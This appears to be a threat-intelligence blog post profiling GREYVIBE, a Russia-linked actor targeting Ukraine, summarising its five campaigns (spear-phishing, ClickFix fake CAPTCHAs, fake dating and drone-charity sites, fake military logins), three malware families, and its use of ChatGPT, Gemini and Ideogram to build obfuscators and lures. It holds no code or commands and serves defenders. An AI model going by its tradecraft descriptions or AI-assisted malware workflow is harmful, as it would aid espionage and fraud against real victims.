GREYVIBE Is The First Russia-Linked Threat Actor Whose Malware Toolkit Was Built With ChatGPT, Ideogram, And Gemini. WithSecure Disclosed Today. Five Campaigns, Three Malware Families.

WithSecure published a comprehensive disclosure today on a previously undocumented Russia-linked threat actor they have been tracking since January 2026 under the name GREYVIBE. The disclosure landed in dual-source coverage at BleepingComputer and The Hacker News with the substantive technical detail and the indicator-of-compromise pack hosted on GitHub. The group is conducting persistent cyberespionage operations against Ukrainian military, government, civilian, and corporate targets. The most significant detail in the disclosure is not the targeting profile or the attribution. It is the tooling. WithSecure documents GREYVIBE as the first publicly-attributed Russia-linked operator group whose malware development pipeline visibly used ChatGPT, Ideogram AI, and Google Gemini to produce custom obfuscators and a PowerShell RAT framework that are now actively deployed in production against Ukrainian targets.

Our adversaries index returned zero prior hits on GREYVIBE when we cross-checked an hour ago. This is a net-new named actor entering the public threat-intelligence lexicon today. This post is our adversary profile.

The Five Campaigns

WithSecure separates GREYVIBE's operational pattern into five named campaigns. The names are the researchers'. Each campaign uses a distinct delivery mechanism appropriate to its target population.

PhantomMail is the spear-phishing arm. GREYVIBE uses Google Drive and 4sync shared-file links to deliver malicious archives that contain decoy PDFs alongside the malware staging components. The lure documents are tailored per-target by the AI-assisted content pipeline, which gives the spear-phish payload a quality of plausibility that the average mass-mailed phishing campaign does not achieve. The targeting is military and government primarily.

PhantomClick is the social-engineering arm focused on browser-tier compromise. The campaign uses fake CAPTCHA pages and ClickFix-style instruction sequences, with the lure pages impersonating Zoom and LAPAS — the latter being a Ukrainian post and parcel service the target population would recognize. The CAPTCHA prompts include fake Cloudflare verification overlays that further establish trust at the visual layer before the victim executes the malicious payload through a copy-paste-to-Run-dialog tradecraft.

PrincessClub is the consumer-tier campaign. GREYVIBE operates fake Ukrainian dating websites that distribute FallSpy Android spyware against male targets and Windows malware against the same. The campaign uses AI-generated photographs of fictitious female personas to populate Telegram outreach accounts that drive prospects to the dating sites. The Telegram persona quality is high enough that conventional social-engineering detection at the chat layer does not catch the lure. The implication is direct. AI-generated personas have crossed the believability threshold for sustained one-to-one social engineering, not just bulk spam.

DroneLink is the affinity-fraud campaign. GREYVIBE runs fake Ukrainian military charity websites themed around FPV drone procurement — a high-emotional-salience donation category in Ukraine during sustained kinetic conflict. Visitors arriving at the charity pages receive malware staging through the donation forms.

Nebo is the credential-harvesting campaign aimed at Ukrainian military personnel directly. GREYVIBE operates fake login pages impersonating Russian military communications systems. The targeting hypothesis is that Ukrainian military personnel may attempt to access Russian-side systems for intelligence or operational reasons, and the fake-login surface harvests both credentials and probe traffic indicating which Ukrainian operators are attempting the access. The targeting is sophisticated because the campaign captures intent in addition to credentials.

The Three Malware Families

LegionRelay is GREYVIBE's flagship PowerShell remote access trojan. WithSecure describes its capabilities as file theft, screenshot capture, credential harvesting, and Remote Desktop setup for hands-on-keyboard follow-on activity. The PowerShell implementation is significant. PowerShell-based malware in 2026 remains effective against organizations that have not implemented PowerShell Constrained Language Mode or equivalent enterprise-tier mitigations, and it remains effective specifically because the language is the legitimate primary administration surface on every Windows endpoint, which makes detection at the script layer a continuous calibration challenge for defenders.

PhantomRelay is the secondary PowerShell RAT. WithSecure documents its capability as system fingerprinting and dynamic script loading. The combination of functions is operationally telling. Fingerprinting plus dynamic loading is the shape of a reconnaissance-and-staging tool whose role in the kill chain is the second stage rather than the persistence layer. PhantomRelay is the tool the operator uses to figure out which deeper payload to send.

FallSpy is the Android spyware. Capabilities include contact list extraction, call log harvesting, location tracking, and broader device fingerprinting. FallSpy is distributed primarily through the PrincessClub dating-site arm. The Android footprint is the part of the GREYVIBE toolkit that survives if a victim's Windows endpoint is wiped, because mobile devices are not typically included in the incident response scope of an Ukrainian government or military victim's immediate breach response.

The Custom Obfuscators And The AI Pipeline

WithSecure identifies four custom obfuscators by name: LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP. These are not off-the-shelf packers. WithSecure documents that GREYVIBE developed them with AI-assisted coding workflows, meaning the operator population behind the campaign used ChatGPT, Gemini, or similar interactive code generation tools to iterate on the obfuscation logic. The implication is the same implication we wrote about yesterday in the Malware-Slop post and the day before in the State-Of-The-Supply-Chain pyramid. The operator population that uses AI to write malware is now visible in the in-the-wild reporting. The detector population that writes the signatures still works the way it has always worked. The asymmetric advantage is shifting toward the operators whose iteration loop is the AI-assisted-development loop, not the manual-development loop.

WithSecure also documents that GREYVIBE used Ideogram AI for visual content generation across the campaign lures — the dating site photos, the fake CAPTCHA branding, the charity-site iconography. The integration of multiple generative AI surfaces — text generation for code, text generation for lure copy, image generation for persona photos — into a single operator workflow is the part of the GREYVIBE disclosure that is going to age as the signature detail. Previous AI-malware coverage has focused on individual modalities. GREYVIBE is the first publicly-attributed operator using the full multimodal stack as a coordinated production pipeline.

The Attribution Evidence

WithSecure's attribution to Russia rests on the standard evidence categories. Russian-language panels in the malware control infrastructure. Russian-language code comments in the malware source. Command-and-control servers configured to UTC plus three, which is Moscow time. Targeting patterns aligned with Russian state interests, specifically the Ukraine military and government victim profile. The attribution confidence WithSecure reaches is consistent with state-aligned attribution, but WithSecure is precise about the layer of uncertainty.

The detail WithSecure raises that is worth dwelling on is the assessment that GREYVIBE "lacked the level of sophistication and operational discipline typically associated with mature nation-state actors." The OPSEC artifacts WithSecure observed include cryptocurrency mining deployment on some victim machines and possible connection to UAC-0098, the cybercriminal-aligned actor previously documented in Ukraine-conflict tradecraft. The cryptocurrency mining detail is operationally telling. State-aligned APTs do not typically deploy crypto-mining payloads on espionage targets because the mining traffic increases detection probability and the financial yield is trivially small relative to the operation's risk. The presence of mining on GREYVIBE victims suggests that some portion of the operator population is monetizing the access independently of the state-aligned mission, which is the recognizable shape of a hybrid criminal-cum-state actor or a state actor running a recruited criminal contractor pool.

The hybrid model has historical precedent in Russian-aligned cyber operations. The detail does not undermine the Russia attribution. It refines it. GREYVIBE is most plausibly a state-aligned operation conducted in part by recruited cybercriminal talent whose individual operators retain financial-incentive side projects on their assigned target estate. The implication for defenders is that the OPSEC sloppiness is real but the strategic mission is also real, and the two characteristics will continue to coexist across the operator population.

Why GREYVIBE Matters Beyond Ukraine

The campaign profile is Ukraine-focused today. The toolkit is not. LegionRelay is a generic PowerShell RAT that will work against any Windows endpoint with PowerShell enabled. FallSpy is a generic Android spyware that will work against any Android device. The obfuscators are generic. The AI-assisted-content pipeline is generic. The campaign architecture — spear-phishing, social-engineering ClickFix, affinity fraud, credential harvesting through fake login pages — is generic. The current targeting is geopolitically driven. The next targeting cycle is whatever the operator population chooses next.

The AI-tooling shape that WithSecure documents is the part defenders outside Ukraine need to absorb today, not next year. The pattern of operator workflow that GREYVIBE represents — multimodal AI for lure development plus AI-assisted malware coding plus a recruited talent pool with hybrid criminal-state motivations — is the operator workflow that the broader threat-actor population is going to converge on through 2026 and 2027 because the operator economics are obviously favorable. The pipeline is fast. The lure quality is high. The talent pool is deeper than the state-aligned talent pool alone. The opsec sloppiness that distinguishes GREYVIBE from a mature nation-state APT is a function of the recruitment model, not the tooling model, and the operator population will close the OPSEC gap as the iteration loop continues.

Our Adversary Profile Entry

We are filing GREYVIBE into our adversaries index with the following attribution. Country: Russia (suspected state sponsor). Attribution confidence: 80 (WithSecure's evidence is multi-source and consistent, though the hybrid-criminal element introduces uncertainty about which specific Russian state organ sponsors the operation). Synonyms: none yet established in the public reporting. Target countries: Ukraine. Target sectors: government, military, defense industrial base, civilian, business. Incident type: espionage with secondary criminal monetization. Named campaigns: PhantomMail, PhantomClick, PrincessClub, DroneLink, Nebo. Named malware: LegionRelay, PhantomRelay, FallSpy. Named obfuscators: LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP. Toolchain signature: multimodal generative AI (ChatGPT for code and copy, Ideogram for images, Gemini for additional content generation). Related actor: UAC-0098 (possible connection). References: WithSecure's disclosure, BleepingComputer's coverage, The Hacker News' coverage, the WithSecure GitHub IOC pack. The defender posture is the standard espionage-actor posture plus PowerShell-language-tier mitigations plus Android device inclusion in incident response scope plus an awareness that the operator's lure quality is now beyond what conventional content-detection heuristics catch.

The Adjacent Reads Today

We have published twice already today and once last night on supply-chain and AI-tooling adjacencies. The GREYVIBE disclosure sits inside the same broader frame. The trust paths and the AI-assisted production pipelines are reshaping the operator landscape faster than the detection layer is calibrating. The defender posture is the same posture we have been writing for two months. Audit the trust paths. Instrument the AI tooling. Treat AI-tool working directories as crown-jewel paths. Read the WithSecure disclosure in full when you have an hour. Pull their IOC pack. Cross-correlate against your own corpus. The receipts compound.

Five campaigns. Three malware families. Four custom obfuscators. One named actor entering the lexicon today. The pyramid keeps building.

How do AI models see YOUR brand?

AIPM has audited 250+ domains. 15 seconds. Free while still in beta.

Audit your site now → aipmsec.com